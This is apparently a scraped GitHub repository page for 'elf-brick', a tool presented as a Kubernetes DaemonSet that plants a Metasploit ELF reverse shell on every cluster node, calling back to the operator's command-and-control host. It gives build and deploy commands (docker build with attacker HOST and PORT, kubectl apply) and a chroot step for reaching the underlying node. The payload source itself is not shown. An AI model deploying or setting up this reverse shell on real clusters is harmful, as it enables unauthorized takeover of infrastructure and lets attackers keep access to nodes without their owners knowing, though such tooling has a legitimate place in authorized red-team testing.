v1sion / elf-brick

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

elf-brick

Kubernetes Daemonset that deploys a Metasploit elf reverse shell back to your C&C and gives access to the underlying node. The Daemonset will deploy a reverse shell per node.

How to build

docker build -t elf-brick . --build-arg HOST="IP" --build-arg PORT="PORT"

How to deploy

kubectl apply -f daemonset.yaml

Node

chroot /chroot

About


Languages

Language:Dockerfile 100.0%